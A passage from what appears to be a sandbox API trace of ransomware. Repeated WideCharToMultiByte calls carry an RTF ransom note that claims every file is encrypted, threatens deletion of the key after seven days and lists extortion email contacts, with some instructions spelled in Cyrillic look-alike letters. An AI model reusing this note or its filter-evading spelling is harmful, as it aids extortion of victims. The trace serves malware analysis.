reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0204.918] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0204.918] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef7aa8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 